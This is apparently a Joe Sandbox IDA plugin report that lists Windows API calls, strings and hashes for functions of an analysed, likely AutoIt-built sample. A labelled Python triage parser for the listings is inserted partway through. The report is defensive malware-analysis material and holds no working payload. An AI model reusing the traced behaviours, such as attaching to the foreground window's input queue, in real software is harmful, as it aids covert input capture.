                                                                                                                                                                  • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                                                  • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                                                  • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32 ref: 0046C63A
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0046C645
                                                                                                                                                                    • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                                                                                    • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                                                                                  • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize
                                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                  • API String ID: 1482215665-1287834457
                                                                                                                                                                  • Opcode ID: 7405bbcb34cbaf548febba9aa03c13379610a97bf21ecf7495a5e9ca82ea5d70
                                                                                                                                                                  • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                                                                                  • Opcode Fuzzy Hash: 7405bbcb34cbaf548febba9aa03c13379610a97bf21ecf7495a5e9ca82ea5d70
                                                                                                                                                                  • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00433A26
                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00433A4E
                                                                                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00433AC1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                  • API String ID: 2179348866-1459072770
                                                                                                                                                                  • Opcode ID: 586ca05a8aad0178944232983c5d24005a3e3eb9d477e0a78306c7d1d137b8f0
                                                                                                                                                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                                                                                  • Opcode Fuzzy Hash: 586ca05a8aad0178944232983c5d24005a3e3eb9d477e0a78306c7d1d137b8f0
                                                                                                                                                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                                  • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                                                                                  • ReleaseCapture.USER32 ref: 0047116F
                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                  • API String ID: 2483343779-2107944366
                                                                                                                                                                  • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                                                                  • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                                                                                  • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                                                                                  • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00496872,00000104,00000001,004115F6,00000000), ref: 004187EE
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,00000001,004115F6,00000000), ref: 004188A0
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004188EC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                                  • String ID: ...$<program name unknown>$@hI$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $rhI
                                                                                                                                                                  • API String ID: 3784150691-1152812861
                                                                                                                                                                  • Opcode ID: f18df1d9ff86c0e07c706bd5a9d898f407085ae0612b91ff6468313bdf9516e4
                                                                                                                                                                  • Instruction ID: 113ef7f6135713692ed5abadedb2fb4a004c8e957f1eafa3cbe622dd24e59533
• Opcode Fuzzy Hash: f18df1d9ff86c0e07c706bd5a9d898f407085ae0612b91ff6468313bdf9516e4
• Instruction Fuzzy Hash: 08413672A002257ADB117779AC45BFF36EC9B05708F51447FF90492282EF2C8E8182AD
APIs
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
• GetDlgCtrlID.USER32(00000000), ref: 00469C84
• GetParent.USER32 ref: 00469C98
• SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
• GetDlgCtrlID.USER32(00000000), ref: 00469CA5
• GetParent.USER32 ref: 00469CBC
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
• Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
• Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
APIs
• SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469E71
• GetDlgCtrlID.USER32(00000000), ref: 00469E82
• GetParent.USER32 ref: 00469E96
• SendMessageW.USER32(00000000,?,00000111), ref: 00469E9D
• GetDlgCtrlID.USER32(00000000), ref: 00469EA3
• GetParent.USER32 ref: 00469EBA
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00469EC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$CtrlParent
• String ID: ComboBox$ListBox
• API String ID: 1383977212-1403004172
• Opcode ID: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
• Instruction ID: 3a0c9dd1fa5fd4c1d1a647422213a645dfa1e4764d365342f395b6f430504e68
• Opcode Fuzzy Hash: 986fe2d2ad3502a89dd9d9f189f0f45c93be64f12821e5ba271ad6af13960510
• Instruction Fuzzy Hash: D121F7716001187BDB00ABA9CC85BBF77ACEB85310F00855FFA44EB2D5D6B8DC4587A5
APIs
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
• SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
• SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
• SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
• SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
• SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ArraySafe$Data$Access$Unaccess$Vartype
• String ID:
• API String ID: 707535999-0
• Opcode ID: 90743f216a4550165bd7be12d2805f681158fdc82f8e1bd898076047334411b0
• Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
• Opcode Fuzzy Hash: 90743f216a4550165bd7be12d2805f681158fdc82f8e1bd898076047334411b0
• Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• GetWindowLongW.USER32(?,000000F0), ref: 004481CF
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
• SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
• SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
• SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
• Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
• Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75A705F0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(75A705F0,00001026,00000000,?), ref: 00448E25
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
• Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
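The "APIs" blocks in these function entries are the raw material for triage, but the plugin prints message constants as bare hex and its argument recovery does not always line up with the Win32 prototype (the same 0x101F appears in the second slot of one SendMessageW line and the third slot of the next). The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a small Python parser for the plugin's "APIs" lines that decodes the window-message constants and flags the GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput(..., TRUE) sequence shown in the entry that follows. The sample lines are copied from this section and labelled as constructed input; the message table is a hand-maintained subset of the Win32 header values; treating that AttachThreadInput sequence as "attach to the foreground window's input queue" is the example's own heuristic, not a finding stated by the report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed samples in the report's own "APIs" format, copied from the
# function listings in this section (addresses and arguments as printed there).
SAMPLE_LISTBOX = """APIs
• SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
• GetDlgCtrlID.USER32(00000000), ref: 00469C84
• GetParent.USER32 ref: 00469C98
• SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
"""

SAMPLE_ATTACH = """APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
"""

# One bullet line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then ", ref: <call site>". GetParent-style lines have no parens.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Hand-maintained subset of the constants seen in this section, from the Win32
# headers (LB_* start at 0x0180, LVM_* at LVM_FIRST = 0x1000). Extend as needed.
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x0186: "LB_SETCURSEL",
    0x018C: "LB_SELECTSTRING",
    0x1001: "LVM_SETBKCOLOR",
    0x1004: "LVM_GETITEMCOUNT",
    0x1008: "LVM_DELETEITEM",
    0x101D: "LVM_GETCOLUMNWIDTH",
    0x101E: "LVM_SETCOLUMNWIDTH",
    0x101F: "LVM_GETHEADER",
    0x1026: "LVM_SETTEXTBKCOLOR",
    0x104D: "LVM_INSERTITEMW",
    0x1057: "LVM_GETSTRINGWIDTHW",
    0x1074: "LVM_SETITEMTEXTW",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report prints "?" (not statically known)
    ref: int                    # address of the call site in the dump
    subcall: Optional[int]      # function the line is attributed to via "Part of subcall"


def parse_api_listing(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one 'APIs' block; headers and unknown lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args: List[Optional[int]] = []
        raw = m.group("args")
        if raw is not None and raw.strip():
            for a in raw.split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def message_name(call: ApiCall) -> Optional[str]:
    """Symbolic uMsg for a SendMessageW call. Because the recovered argument
    positions are unreliable, any argument matching a known constant is accepted
    rather than trusting the second slot of the prototype."""
    if call.api != "SendMessageW":
        return None
    for a in call.args:
        if a in WINDOW_MESSAGES:
            return WINDOW_MESSAGES[a]
    return None


def foreground_input_attach_sites(calls: List[ApiCall]) -> List[int]:
    """Call sites of AttachThreadInput(..., fAttach=TRUE) that follow
    GetForegroundWindow and GetWindowThreadProcessId within one function:
    the sequence used to attach to the foreground window's input queue."""
    seen_fg = seen_tid = False
    hits = []
    for c in calls:
        if c.api == "GetForegroundWindow":
            seen_fg = True
        elif c.api == "GetWindowThreadProcessId" and seen_fg:
            seen_tid = True
        elif (c.api == "AttachThreadInput" and seen_fg and seen_tid
              and len(c.args) >= 3 and c.args[2] == 1):
            hits.append(c.ref)
    return hits


if __name__ == "__main__":
    for c in parse_api_listing(SAMPLE_LISTBOX):
        print("%08X %s.%s %s" % (c.ref, c.api, c.module, message_name(c) or ""))
    print("attach sites:", ["%08X" % r for r in foreground_input_attach_sites(parse_api_listing(SAMPLE_ATTACH))])
```

Run over the whole "APIs" block of an entry rather than single lines: the attach heuristic is order-sensitive and only meaningful within one function, and a TRUE/FALSE pair of AttachThreadInput calls (as in the entry below) is the normal attach/detach bracket, so the returned sites are a starting point for reading the function, not a verdict.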
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                  • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                  • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                                                                  • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                  • API String ID: 0-1603158881
                                                                                                                                                                  • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                                                                  • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                                                                  • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
